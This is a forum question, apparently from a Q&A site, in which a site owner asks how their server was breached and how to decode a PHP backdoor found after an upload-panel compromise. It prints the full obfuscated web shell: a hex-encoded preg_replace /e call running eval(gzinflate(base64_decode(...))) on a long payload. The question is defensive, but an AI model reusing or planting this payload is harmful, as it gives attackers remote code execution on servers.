How to protect me from this PHP backdoor?

Asked

Viewed 628 times

0

A few days ago a site I developed was invaded by those famous php backdoor. What I keep thinking is where is the root cause of the invasion of this blackhat? I know that I must control my folder permissions as needed and insert htaccess to protect certain files, but where did the attacker find the loophole to upload this script to run this shell? The server that hosts the site is a windows server unfortunately without large security controls in a datacenter here in the region (RS). But I prefer to believe that it is a flaw in the administrative panel of my site, where I have options to upload images. Because the script called "ws0oxp.php" started there. So it was further uploaded by this shell in the main directory.

How do I clear this preg_replace to identify the php code behind this? I’m still investigating and the script stays there:

    <?php
preg_replace("\x2F\x2E\x2A\x2F\x65","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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